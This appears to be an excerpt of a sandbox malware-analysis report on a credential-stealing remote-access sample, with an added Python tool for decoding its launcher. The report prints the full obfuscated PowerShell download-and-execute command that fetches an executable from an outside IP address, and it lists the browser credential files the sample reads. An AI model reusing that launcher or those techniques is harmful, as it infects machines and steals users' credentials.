                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00433B44
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00433CD7 SetUnhandledExceptionFilter, 6_2_00433CD7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_007B43CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_007B43CF
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_007BA8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_007BA8C4
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_007B3DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_007B3DAB
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 6_2_00410F36
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00418754 mouse_event, 6_2_00418754
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe "C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jhjiqvp5bkw1ug1uicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurklvrzueugicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrfzkluavrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vti5kbewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietidutvvmpvyuxllhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbwwwzjlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbma0zht09rclbiuix1aw50icagicagicagicagicagicagicagicagicagicagicagifdzee9urlffzxassw50uhryicagicagicagicagicagicagicagicagicagicagicagiefowfepoycgicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicagimlsrfn1iiagicagicagicagicagicagicagicagicagicagicagicattmfnzxnqywnficagicagicagicagicagicagicagicagicagicagicagie5st0nzicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjhjiqvp5bkw1ug1uojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc5lje2ni83ns9ly29tzs5leguilcikrw52okfquerbvefcbmljzxrvbwvldhlvdxn3zwvldc5leguildasmck7u1rbulqtu2xfrxaomyk7au52b0tflwvyufjlu1njb24gicagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxuawnldg9tzwv0ew91c3dlzwv0lmv4zsi='+[char]0x22+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jhjiqvp5bkw1ug1uicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurklvrzueugicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrfzkluavrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vti5kbewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietidutvvmpvyuxllhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbwwwzjlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbma0zht09rclbiuix1aw50icagicagicagicagicagicagicagicagicagicagicagifdzee9urlffzxassw50uhryicagicagicagicagicagicagicagicagicagicagicagiefowfepoycgicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicagimlsrfn1iiagicagicagicagicagicagicagicagicagicagicagicattmfnzxnqywnficagicagicagicagicagicagicagicagicagicagicagie5st0nzicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjhjiqvp5bkw1ug1uojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc5lje2ni83ns9ly29tzs5leguilcikrw52okfquerbvefcbmljzxrvbwvldhlvdxn3zwvldc5leguildasmck7u1rbulqtu2xfrxaomyk7au52b0tflwvyufjlu1njb24gicagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxuawnldg9tzwv0ew91c3dlzwv0lmv4zsi='+[char]0x22+'))')))"
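                The launcher above, which mshta.exe hands to cmd.exe and then to powershell.exe, never contains the string "::" or a double quote: the expression [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")) is assembled at run time from single-quoted fragments joined with [char]58, [char]0x3a (both ':') and [char]0x22 ('"'), and the result is passed through invoke-expression twice. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it resolves that concatenation statically, pulls out the Base64 argument, tries to decode it, and lists the launcher flags worth alerting on (-ex bypass, -nop, -w 1, invoke-expression, [char] casts, FromBase64String). The command line it runs on is constructed in the shape of the one above with a harmless placeholder payload. One caveat the example also demonstrates: the command lines on this page are rendered entirely in lower case, and Base64 is case-sensitive, so the payload as printed here does not decode to the original script; take the original casing from the .hta itself or from process-creation telemetry (Sysmon event 1, Security 4688) before decoding.

```python
"""
Added example, not part of the sandbox report: statically unwrap the
PowerShell launcher spawned by mshta.exe.  The launcher builds

    [System.Text.Encoding]::UTF8.GetString(
        [System.Convert]::FromBase64String("<base64>"))

from single-quoted fragments glued together with [char]N casts so that
neither '::' nor a double quote appears literally in the command line.
"""
import base64
import re

# One single-quoted PowerShell literal ('' is an escaped quote inside it) or one
# [char]N cast, where N may be decimal (58) or hexadecimal (0x3a).
_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)

# The call that carries the Base64 payload once the [char] casts are resolved.
_B64_CALL = re.compile(r'frombase64string\(\s*"([a-z0-9+/=]+)"\s*\)', re.IGNORECASE)

# Launcher flags and primitives worth alerting on, matched case-insensitively.
INDICATORS = {
    "exec-policy-bypass": r"-e(?:x|p|xec|xecutionpolicy)?\s+bypass",
    "no-profile": r"-nop\b|-noprofile\b",
    "hidden-window": r"-w(?:indowstyle)?\s+(?:1|hidden)\b",
    "invoke-expression": r"invoke-expression|\biex\b",
    "char-concat": r"\[char\]\s*(?:0x[0-9a-f]+|\d+)",
    "base64-decode": r"frombase64string",
}


def resolve_char_concat(expr: str) -> str:
    """Evaluate an expression of the shape 'a'+[char]58+'b'+... into the string it
    builds.  Only single-quoted literals and [char] casts are consumed; the '+'
    operators and everything outside the fragments are ignored."""
    parts = []
    for m in _TOKEN.finditer(expr):
        if m.group(1) is not None:
            parts.append(m.group(1).replace("''", "'"))
        else:
            parts.append(chr(int(m.group(2), 0)))  # base 0 accepts '58' and '0x3a'
    return "".join(parts)


def unwrap_launcher(cmdline: str) -> dict:
    """Resolve the concatenation, extract the Base64 argument and try to decode it.
    'decoded' is None when the payload is not valid Base64 or not UTF-8, which is
    what happens to a lower-cased copy of the command line: Base64 is case-sensitive."""
    inner = resolve_char_concat(cmdline)
    m = _B64_CALL.search(inner)
    if m is None:
        return {"inner": inner, "payload": None, "decoded": None}
    payload = m.group(1)
    try:
        decoded = base64.b64decode(payload, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        decoded = None
    return {"inner": inner, "payload": payload, "decoded": decoded}


def launcher_indicators(cmdline: str) -> list:
    """Names of the INDICATORS present in a command line, in dictionary order."""
    return [name for name, pat in INDICATORS.items()
            if re.search(pat, cmdline, re.IGNORECASE)]


# Constructed sample in the shape of the report's command line.  The Base64 is a
# harmless placeholder ("Write-Host hello" encoded), not the payload of the sample.
SAMPLE_CMDLINE = (
    '"c:\\windows\\system32\\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c '
    "devicecredentialdeployment.exe ; invoke-expression($(invoke-expression("
    "'[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'"
    "+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'V3JpdGUtSG9zdCBoZWxsbw=='"
    "+[char]0x22+'))')))\""
)

if __name__ == "__main__":
    result = unwrap_launcher(SAMPLE_CMDLINE)
    print("resolved  :", result["inner"])
    print("decoded   :", result["decoded"])
    print("indicators:", launcher_indicators(SAMPLE_CMDLINE))
    # The lower-cased copy resolves to the same call but its payload no longer decodes.
    print("lower-case:", unwrap_launcher(SAMPLE_CMDLINE.lower())["decoded"])
```

                The resolver only understands the two constructs this launcher uses; a sample that also string-formats with -f, reverses strings or splits on delimiters needs the corresponding rules added, or the command line should simply be run under a PowerShell with script block logging (event 4104) enabled, which records the expanded script regardless of how it was assembled.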
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00433E0A cpuid 6_2_00433E0A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: EnumSystemLocalesW, 6_2_004470AE
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoW, 6_2_004510BA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_004511E3
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoW, 6_2_004512EA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_004513B7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoW, 6_2_00447597
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoA, 6_2_0040E679
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 6_2_00450A7F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: EnumSystemLocalesW, 6_2_00450CF7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: EnumSystemLocalesW, 6_2_00450D42
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: EnumSystemLocalesW, 6_2_00450DDD
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_00450E6A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: EnumSystemLocalesW, 6_2_007D1044
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoW, 6_2_007D1321
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: EnumSystemLocalesW, 6_2_007C7315
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_007D144A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoW, 6_2_007D1551
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_007D161E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoW, 6_2_007C77FE
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: GetLocaleInfoA, 6_2_0078E8E0
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 6_2_007D0CE6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: EnumSystemLocalesW, 6_2_007D0F5E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: EnumSystemLocalesW, 6_2_007D0FA9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00404915 GetLocalTime,CreateEventA,CreateThread, 6_2_00404915
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0041A7A2 GetComputerNameExW,GetUserNameW, 6_2_0041A7A2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 6_2_00448057
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.9.dr | Binary or memory string: msmpeng.exe
                Source: Amcache.hve.9.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.9.dr | Binary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 6_2_0040B21B
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 6_2_0040B335
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: \key3.db 6_2_0040B335

                Remote Access Functionality

                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-GJDISH
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: cmd.exe 6_2_00405042
MITRE ATT&CK Matrix (flattened in extraction; listed below are only the techniques the matrix marks for this sample, grouped by tactic, with the numeric marker shown in the matrix in parentheses)

• Execution: Native API (1); Command and Scripting Interpreter (122); Service Execution (2); PowerShell (3)
• Persistence: DLL Side-Loading (1); Windows Service (1)
• Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (21)
• Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (22); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (21)
• Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials In Files (2)
